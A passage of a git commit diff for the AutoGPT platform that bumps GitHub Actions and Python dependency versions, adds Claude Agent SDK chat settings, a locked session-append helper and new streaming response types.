fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY

Only override ANTHROPIC_API_KEY="" when both a valid base_url (starts with http) and api_key are configured. Otherwise fall back to SDK default credentials so direct Anthropic usage still works.
refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity
2026-02-12 07:45:14 -05:00 · 2026-02-12 13:37:59 +04:00 · 2026-02-12 13:36:48 +04:00 · 2026-02-12 13:12:42 +04:00 · 2026-02-12 09:10:43 +04:00 · 2026-02-12 08:26:26 +04:00
235 changed files with 22044 additions and 12845 deletions
--- a/.github/workflows/classic-frontend-ci.yml
+++ b/.github/workflows/classic-frontend-ci.yml
@@ -49,7 +49,7 @@ jobs:

      - name: Create PR ${{ env.BUILD_BRANCH }} -> ${{ github.ref_name }}
        if: github.event_name == 'push'
-        uses: peter-evans/create-pull-request@v7
+        uses: peter-evans/create-pull-request@v8
        with:
          add-paths: classic/frontend/build/web
          base: ${{ github.ref_name }}
--- a/.github/workflows/claude-ci-failure-auto-fix.yml
+++ b/.github/workflows/claude-ci-failure-auto-fix.yml
@@ -22,7 +22,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          ref: ${{ github.event.workflow_run.head_branch }}
          fetch-depth: 0
@@ -42,7 +42,7 @@ jobs:

      - name: Get CI failure details
        id: failure_details
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const run = await github.rest.actions.getWorkflowRun({
--- a/.github/workflows/claude-dependabot.yml
+++ b/.github/workflows/claude-dependabot.yml
@@ -30,7 +30,7 @@ jobs:
      actions: read # Required for CI access
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -41,7 +41,7 @@ jobs:
          python-version: "3.11"  # Use standard version matching CI

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -78,7 +78,7 @@ jobs:

      # Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22"

@@ -91,7 +91,7 @@ jobs:
          echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV

      - name: Cache frontend dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -124,7 +124,7 @@ jobs:
      # Phase 1: Cache and load Docker images for faster setup
      - name: Set up Docker image cache
        id: docker-cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/docker-cache
          # Use a versioned key for cache invalidation when image list changes
@@ -309,6 +309,7 @@ jobs:
        uses: anthropics/claude-code-action@v1
        with:
          claude_code_oauth_token: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
+          allowed_bots: "dependabot[bot]"
          claude_args: |
            --allowedTools "Bash(npm:*),Bash(pnpm:*),Bash(poetry:*),Bash(git:*),Edit,Replace,NotebookEditCell,mcp__github_inline_comment__create_inline_comment,Bash(gh pr comment:*), Bash(gh pr diff:*), Bash(gh pr view:*)"
          prompt: |
--- a/.github/workflows/claude.yml
+++ b/.github/workflows/claude.yml
@@ -40,7 +40,7 @@ jobs:
      actions: read # Required for CI access
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -57,7 +57,7 @@ jobs:
          python-version: "3.11"  # Use standard version matching CI

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -94,7 +94,7 @@ jobs:

      # Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22"

@@ -107,7 +107,7 @@ jobs:
          echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV

      - name: Cache frontend dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -140,7 +140,7 @@ jobs:
      # Phase 1: Cache and load Docker images for faster setup
      - name: Set up Docker image cache
        id: docker-cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/docker-cache
          # Use a versioned key for cache invalidation when image list changes
--- a/.github/workflows/codeql.yml
+++ b/.github/workflows/codeql.yml
@@ -58,7 +58,7 @@ jobs:
        # your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
    steps:
    - name: Checkout repository
-      uses: actions/checkout@v4
+      uses: actions/checkout@v6

    # Initializes the CodeQL tools for scanning.
    - name: Initialize CodeQL
--- a/.github/workflows/copilot-setup-steps.yml
+++ b/.github/workflows/copilot-setup-steps.yml
@@ -27,7 +27,7 @@ jobs:
    # If you do not check out your code, Copilot will do this for you.
    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0
          submodules: true
@@ -39,7 +39,7 @@ jobs:
          python-version: "3.11"  # Use standard version matching CI

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -76,7 +76,7 @@ jobs:

      # Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22"

@@ -89,7 +89,7 @@ jobs:
          echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV

      - name: Cache frontend dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -132,7 +132,7 @@ jobs:
      # Phase 1: Cache and load Docker images for faster setup
      - name: Set up Docker image cache
        id: docker-cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/docker-cache
          # Use a versioned key for cache invalidation when image list changes
--- a/.github/workflows/docs-block-sync.yml
+++ b/.github/workflows/docs-block-sync.yml
@@ -23,7 +23,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -33,7 +33,7 @@ jobs:
          python-version: "3.11"

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/docs-claude-review.yml
+++ b/.github/workflows/docs-claude-review.yml
@@ -23,7 +23,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0

@@ -33,7 +33,7 @@ jobs:
          python-version: "3.11"

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/docs-enhance.yml
+++ b/.github/workflows/docs-enhance.yml
@@ -28,7 +28,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 1

@@ -38,7 +38,7 @@ jobs:
          python-version: "3.11"

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/platform-autogpt-deploy-dev.yaml
+++ b/.github/workflows/platform-autogpt-deploy-dev.yaml
@@ -25,7 +25,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          ref: ${{ github.event.inputs.git_ref || github.ref_name }}

@@ -52,7 +52,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Trigger deploy workflow
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DEPLOY_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
--- a/.github/workflows/platform-autogpt-deploy-prod.yml
+++ b/.github/workflows/platform-autogpt-deploy-prod.yml
@@ -17,7 +17,7 @@ jobs:

    steps:
      - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          ref: ${{ github.ref_name || 'master' }}

@@ -45,7 +45,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: Trigger deploy workflow
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DEPLOY_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
--- a/.github/workflows/platform-backend-ci.yml
+++ b/.github/workflows/platform-backend-ci.yml
@@ -68,7 +68,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0
          submodules: true
@@ -88,7 +88,7 @@ jobs:
        run: echo "date=$(date +'%Y-%m-%d')" >> $GITHUB_OUTPUT

      - name: Set up Python dependency cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.cache/pypoetry
          key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
--- a/.github/workflows/platform-dev-deploy-event-dispatcher.yml
+++ b/.github/workflows/platform-dev-deploy-event-dispatcher.yml
@@ -17,7 +17,7 @@ jobs:
      - name: Check comment permissions and deployment status
        id: check_status
        if: github.event_name == 'issue_comment' && github.event.issue.pull_request
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const commentBody = context.payload.comment.body.trim();
@@ -55,7 +55,7 @@ jobs:

      - name: Post permission denied comment
        if: steps.check_status.outputs.permission_denied == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
@@ -68,7 +68,7 @@ jobs:
      - name: Get PR details for deployment
        id: pr_details
        if: steps.check_status.outputs.should_deploy == 'true' || steps.check_status.outputs.should_undeploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const pr = await github.rest.pulls.get({
@@ -82,7 +82,7 @@ jobs:
          
      - name: Dispatch Deploy Event
        if: steps.check_status.outputs.should_deploy == 'true'
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DISPATCH_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -98,7 +98,7 @@ jobs:

      - name: Post deploy success comment
        if: steps.check_status.outputs.should_deploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
@@ -110,7 +110,7 @@ jobs:

      - name: Dispatch Undeploy Event (from comment)
        if: steps.check_status.outputs.should_undeploy == 'true'
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DISPATCH_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -126,7 +126,7 @@ jobs:

      - name: Post undeploy success comment
        if: steps.check_status.outputs.should_undeploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
@@ -139,7 +139,7 @@ jobs:
      - name: Check deployment status on PR close
        id: check_pr_close
        if: github.event_name == 'pull_request' && github.event.action == 'closed'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            const comments = await github.rest.issues.listComments({
@@ -168,7 +168,7 @@ jobs:
          github.event_name == 'pull_request' &&
          github.event.action == 'closed' &&
          steps.check_pr_close.outputs.should_undeploy == 'true'
-        uses: peter-evans/repository-dispatch@v3
+        uses: peter-evans/repository-dispatch@v4
        with:
          token: ${{ secrets.DISPATCH_TOKEN }}
          repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -187,7 +187,7 @@ jobs:
          github.event_name == 'pull_request' &&
          github.event.action == 'closed' &&
          steps.check_pr_close.outputs.should_undeploy == 'true'
-        uses: actions/github-script@v7
+        uses: actions/github-script@v8
        with:
          script: |
            await github.rest.issues.createComment({
--- a/.github/workflows/platform-frontend-ci.yml
+++ b/.github/workflows/platform-frontend-ci.yml
@@ -31,7 +31,7 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6

      - name: Check for component changes
        uses: dorny/paths-filter@v3
@@ -42,7 +42,7 @@ jobs:
              - 'autogpt_platform/frontend/src/components/**'

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -54,7 +54,7 @@ jobs:
        run: echo "key=${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}" >> $GITHUB_OUTPUT

      - name: Cache dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ steps.cache-key.outputs.key }}
@@ -71,10 +71,10 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -82,7 +82,7 @@ jobs:
        run: corepack enable

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
@@ -107,12 +107,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          fetch-depth: 0

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -120,7 +120,7 @@ jobs:
        run: corepack enable

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
@@ -148,12 +148,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          submodules: recursive

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -176,7 +176,7 @@ jobs:
        uses: docker/setup-buildx-action@v3

      - name: Cache Docker layers
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: /tmp/.buildx-cache
          key: ${{ runner.os }}-buildx-frontend-test-${{ hashFiles('autogpt_platform/docker-compose.yml', 'autogpt_platform/backend/Dockerfile', 'autogpt_platform/backend/pyproject.toml', 'autogpt_platform/backend/poetry.lock') }}
@@ -231,7 +231,7 @@ jobs:
          fi

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
@@ -277,12 +277,12 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          submodules: recursive

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -290,7 +290,7 @@ jobs:
        run: corepack enable

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
--- a/.github/workflows/platform-fullstack-ci.yml
+++ b/.github/workflows/platform-fullstack-ci.yml
@@ -29,10 +29,10 @@ jobs:

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -44,7 +44,7 @@ jobs:
        run: echo "key=${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}" >> $GITHUB_OUTPUT

      - name: Cache dependencies
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ steps.cache-key.outputs.key }}
@@ -56,19 +56,19 @@ jobs:
        run: pnpm install --frozen-lockfile

  types:
-    runs-on: ubuntu-latest
+    runs-on: big-boi
    needs: setup
    strategy:
      fail-fast: false

    steps:
      - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
        with:
          submodules: recursive

      - name: Set up Node.js
-        uses: actions/setup-node@v4
+        uses: actions/setup-node@v6
        with:
          node-version: "22.18.0"

@@ -85,10 +85,10 @@ jobs:

      - name: Run docker compose
        run: |
-          docker compose -f ../docker-compose.yml --profile local --profile deps_backend up -d
+          docker compose -f ../docker-compose.yml --profile local up -d deps_backend

      - name: Restore dependencies cache
-        uses: actions/cache@v4
+        uses: actions/cache@v5
        with:
          path: ~/.pnpm-store
          key: ${{ needs.setup.outputs.cache-key }}
--- a/.github/workflows/repo-workflow-checker.yml
+++ b/.github/workflows/repo-workflow-checker.yml
@@ -11,7 +11,7 @@ jobs:
    steps:
      # - name: Wait some time for all actions to start
      #   run: sleep 30
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@v6
        # with:
          # fetch-depth: 0
      - name: Set up Python
--- a/autogpt_platform/autogpt_libs/poetry.lock
+++ b/autogpt_platform/autogpt_libs/poetry.lock
--- a/autogpt_platform/autogpt_libs/pyproject.toml
+++ b/autogpt_platform/autogpt_libs/pyproject.toml
@@ -9,25 +9,25 @@ packages = [{ include = "autogpt_libs" }]
 [tool.poetry.dependencies]
 python = ">=3.10,<4.0"
 colorama = "^0.4.6"
-cryptography = "^45.0"
+cryptography = "^46.0"
 expiringdict = "^1.2.2"
-fastapi = "^0.116.1"
-google-cloud-logging = "^3.12.1"
-launchdarkly-server-sdk = "^9.12.0"
-pydantic = "^2.11.7"
-pydantic-settings = "^2.10.1"
-pyjwt = { version = "^2.10.1", extras = ["crypto"] }
+fastapi = "^0.128.0"
+google-cloud-logging = "^3.13.0"
+launchdarkly-server-sdk = "^9.14.1"
+pydantic = "^2.12.5"
+pydantic-settings = "^2.12.0"
+pyjwt = { version = "^2.11.0", extras = ["crypto"] }
 redis = "^6.2.0"
-supabase = "^2.16.0"
-uvicorn = "^0.35.0"
+supabase = "^2.27.2"
+uvicorn = "^0.40.0"

 [tool.poetry.group.dev.dependencies]
-pyright = "^1.1.404"
+pyright = "^1.1.408"
 pytest = "^8.4.1"
-pytest-asyncio = "^1.1.0"
-pytest-mock = "^3.14.1"
-pytest-cov = "^6.2.1"
-ruff = "^0.12.11"
+pytest-asyncio = "^1.3.0"
+pytest-mock = "^3.15.1"
+pytest-cov = "^7.0.0"
+ruff = "^0.15.0"

 [build-system]
 requires = ["poetry-core"]
--- a/autogpt_platform/backend/Dockerfile
+++ b/autogpt_platform/backend/Dockerfile
@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
    DEBIAN_FRONTEND=noninteractive
 ENV PATH=/opt/poetry/bin:$PATH

-# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
+# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
+# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
 RUN apt-get update && apt-get install -y \
    python3.13 \
    python3-pip \
    ffmpeg \
    imagemagick \
+    jq \
+    ripgrep \
+    tree \
    && rm -rf /var/lib/apt/lists/*

 # Copy only necessary files from builder
--- a/autogpt_platform/backend/backend/api/features/chat/config.py
+++ b/autogpt_platform/backend/backend/api/features/chat/config.py
@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
    session_ttl: int = Field(default=43200, description="Session TTL in seconds")

    # Streaming Configuration
-    max_context_messages: int = Field(
-        default=50, ge=1, le=200, description="Maximum context messages"
-    )
-
    stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
-    max_retries: int = Field(default=3, description="Maximum number of retries")
+    max_retries: int = Field(
+        default=3,
+        description="Max retries for fallback path (SDK handles retries internally)",
+    )
    max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
    max_agent_schedules: int = Field(
        default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,33 @@ class ChatConfig(BaseSettings):
        description="Name of the prompt in Langfuse to fetch",
    )

+    # Claude Agent SDK Configuration
+    use_claude_agent_sdk: bool = Field(
+        default=True,
+        description="Use Claude Agent SDK for chat completions",
+    )
+    claude_agent_model: str | None = Field(
+        default=None,
+        description="Model for the Claude Agent SDK path. If None, derives from "
+        "the `model` field by stripping the OpenRouter provider prefix.",
+    )
+    claude_agent_max_budget_usd: float | None = Field(
+        default=None,
+        gt=0,
+        description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
+    )
+    claude_agent_max_buffer_size: int = Field(
+        default=10 * 1024 * 1024,  # 10MB (default SDK is 1MB)
+        description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
+        "Increase if tool outputs exceed the limit.",
+    )
+
+    # Extended thinking configuration for Claude models
+    thinking_enabled: bool = Field(
+        default=True,
+        description="Enable adaptive thinking for Claude models via OpenRouter",
+    )
+
    @field_validator("api_key", mode="before")
    @classmethod
    def get_api_key(cls, v):
@@ -132,6 +158,17 @@ class ChatConfig(BaseSettings):
            v = os.getenv("CHAT_INTERNAL_API_KEY")
        return v

+    @field_validator("use_claude_agent_sdk", mode="before")
+    @classmethod
+    def get_use_claude_agent_sdk(cls, v):
+        """Get use_claude_agent_sdk from environment if not provided."""
+        # Check environment variable - default to True if not set
+        env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
+        if env_val:
+            return env_val in ("true", "1", "yes", "on")
+        # Default to True (SDK enabled by default)
+        return True if v is None else v
+
    # Prompt paths for different contexts
    PROMPT_PATHS: dict[str, str] = {
        "default": "prompts/chat_system.md",
--- a/autogpt_platform/backend/backend/api/features/chat/db.py
+++ b/autogpt_platform/backend/backend/api/features/chat/db.py
@@ -45,10 +45,7 @@ async def create_chat_session(
        successfulAgentRuns=SafeJson({}),
        successfulAgentSchedules=SafeJson({}),
    )
-    return await PrismaChatSession.prisma().create(
-        data=data,
-        include={"Messages": True},
-    )
+    return await PrismaChatSession.prisma().create(data=data)


 async def update_chat_session(
--- a/autogpt_platform/backend/backend/api/features/chat/model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/model.py
@@ -273,9 +273,8 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
    try:
        session = ChatSession.model_validate_json(raw_session)
        logger.info(
-            f"Loading session {session_id} from cache: "
-            f"message_count={len(session.messages)}, "
-            f"roles={[m.role for m in session.messages]}"
+            f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
+            f"last_roles={[m.role for m in session.messages[-3:]]}"  # Last 3 roles
        )
        return session
    except Exception as e:
@@ -317,11 +316,9 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
        return None

    messages = prisma_session.Messages
-    logger.info(
-        f"Loading session {session_id} from DB: "
-        f"has_messages={messages is not None}, "
-        f"message_count={len(messages) if messages else 0}, "
-        f"roles={[m.role for m in messages] if messages else []}"
+    logger.debug(
+        f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
+        f"roles={[m.role for m in messages[-3:]] if messages else []}"  # Last 3 roles
    )

    return ChatSession.from_db(prisma_session, messages)
@@ -372,10 +369,9 @@ async def _save_session_to_db(
                    "function_call": msg.function_call,
                }
            )
-        logger.info(
-            f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
-            f"roles={[m['role'] for m in messages_data]}, "
-            f"start_sequence={existing_message_count}"
+        logger.debug(
+            f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
+            f"roles={[m['role'] for m in messages_data]}"
        )
        await chat_db.add_chat_messages_batch(
            session_id=session.session_id,
@@ -415,7 +411,7 @@ async def get_chat_session(
        logger.warning(f"Unexpected cache error for session {session_id}: {e}")

    # Fall back to database
-    logger.info(f"Session {session_id} not in cache, checking database")
+    logger.debug(f"Session {session_id} not in cache, checking database")
    session = await _get_session_from_db(session_id)

    if session is None:
@@ -432,7 +428,6 @@ async def get_chat_session(
    # Cache the session from DB
    try:
        await _cache_session(session)
-        logger.info(f"Cached session {session_id} from database")
    except Exception as e:
        logger.warning(f"Failed to cache session {session_id}: {e}")

@@ -497,6 +492,40 @@ async def upsert_chat_session(
        return session


+async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
+    """Atomically append a message to a session and persist it.
+
+    Acquires the session lock, re-fetches the latest session state,
+    appends the message, and saves — preventing message loss when
+    concurrent requests modify the same session.
+    """
+    lock = await _get_session_lock(session_id)
+
+    async with lock:
+        session = await get_chat_session(session_id)
+        if session is None:
+            raise ValueError(f"Session {session_id} not found")
+
+        session.messages.append(message)
+        existing_message_count = await chat_db.get_chat_session_message_count(
+            session_id
+        )
+
+        try:
+            await _save_session_to_db(session, existing_message_count)
+        except Exception as e:
+            raise DatabaseError(
+                f"Failed to persist message to session {session_id}"
+            ) from e
+
+        try:
+            await _cache_session(session)
+        except Exception as e:
+            logger.warning(f"Cache write failed for session {session_id}: {e}")
+
+        return session
+
+
 async def create_chat_session(user_id: str) -> ChatSession:
    """Create a new chat session and persist it.

@@ -603,13 +632,19 @@ async def update_session_title(session_id: str, title: str) -> bool:
            logger.warning(f"Session {session_id} not found for title update")
            return False

-        # Invalidate cache so next fetch gets updated title
+        # Update title in cache if it exists (instead of invalidating).
+        # This prevents race conditions where cache invalidation causes
+        # the frontend to see stale DB data while streaming is still in progress.
        try:
-            redis_key = _get_session_cache_key(session_id)
-            async_redis = await get_redis_async()
-            await async_redis.delete(redis_key)
+            cached = await _get_session_from_cache(session_id)
+            if cached:
+                cached.title = title
+                await _cache_session(cached)
        except Exception as e:
-            logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
+            # Not critical - title will be correct on next full cache refresh
+            logger.warning(
+                f"Failed to update title in cache for session {session_id}: {e}"
+            )

        return True
    except Exception as e:
--- a/autogpt_platform/backend/backend/api/features/chat/response_model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/response_model.py
@@ -10,6 +10,8 @@ from typing import Any

 from pydantic import BaseModel, Field

+from backend.util.json import dumps as json_dumps
+

 class ResponseType(str, Enum):
    """Types of streaming responses following AI SDK protocol."""
@@ -18,6 +20,10 @@ class ResponseType(str, Enum):
    START = "start"
    FINISH = "finish"

+    # Step lifecycle (one LLM API call within a message)
+    START_STEP = "start-step"
+    FINISH_STEP = "finish-step"
+
    # Text streaming
    TEXT_START = "text-start"
    TEXT_DELTA = "text-delta"
@@ -57,6 +63,16 @@ class StreamStart(StreamBaseResponse):
        description="Task ID for SSE reconnection. Clients can reconnect using GET /tasks/{taskId}/stream",
    )

+    def to_sse(self) -> str:
+        """Convert to SSE format, excluding non-protocol fields like taskId."""
+        import json
+
+        data: dict[str, Any] = {
+            "type": self.type.value,
+            "messageId": self.messageId,
+        }
+        return f"data: {json.dumps(data)}\n\n"
+

 class StreamFinish(StreamBaseResponse):
    """End of message/stream."""
@@ -64,6 +80,26 @@ class StreamFinish(StreamBaseResponse):
    type: ResponseType = ResponseType.FINISH


+class StreamStartStep(StreamBaseResponse):
+    """Start of a step (one LLM API call within a message).
+
+    The AI SDK uses this to add a step-start boundary to message.parts,
+    enabling visual separation between multiple LLM calls in a single message.
+    """
+
+    type: ResponseType = ResponseType.START_STEP
+
+
+class StreamFinishStep(StreamBaseResponse):
+    """End of a step (one LLM API call within a message).
+
+    The AI SDK uses this to reset activeTextParts and activeReasoningParts,
+    so the next LLM call in a tool-call continuation starts with clean state.
+    """
+
+    type: ResponseType = ResponseType.FINISH_STEP
+
+
 # ========== Text Streaming ==========


@@ -117,7 +153,7 @@ class StreamToolOutputAvailable(StreamBaseResponse):
    type: ResponseType = ResponseType.TOOL_OUTPUT_AVAILABLE
    toolCallId: str = Field(..., description="Tool call ID this responds to")
    output: str | dict[str, Any] = Field(..., description="Tool execution output")
-    # Additional fields for internal use (not part of AI SDK spec but useful)
+    # Keep these for internal backend use
    toolName: str | None = Field(
        default=None, description="Name of the tool that was executed"
    )
@@ -125,6 +161,17 @@ class StreamToolOutputAvailable(StreamBaseResponse):
        default=True, description="Whether the tool execution succeeded"
    )

+    def to_sse(self) -> str:
+        """Convert to SSE format, excluding non-spec fields."""
+        import json
+
+        data = {
+            "type": self.type.value,
+            "toolCallId": self.toolCallId,
+            "output": self.output,
+        }
+        return f"data: {json.dumps(data)}\n\n"
+

 # ========== Other ==========

@@ -148,6 +195,18 @@ class StreamError(StreamBaseResponse):
        default=None, description="Additional error details"
    )

+    def to_sse(self) -> str:
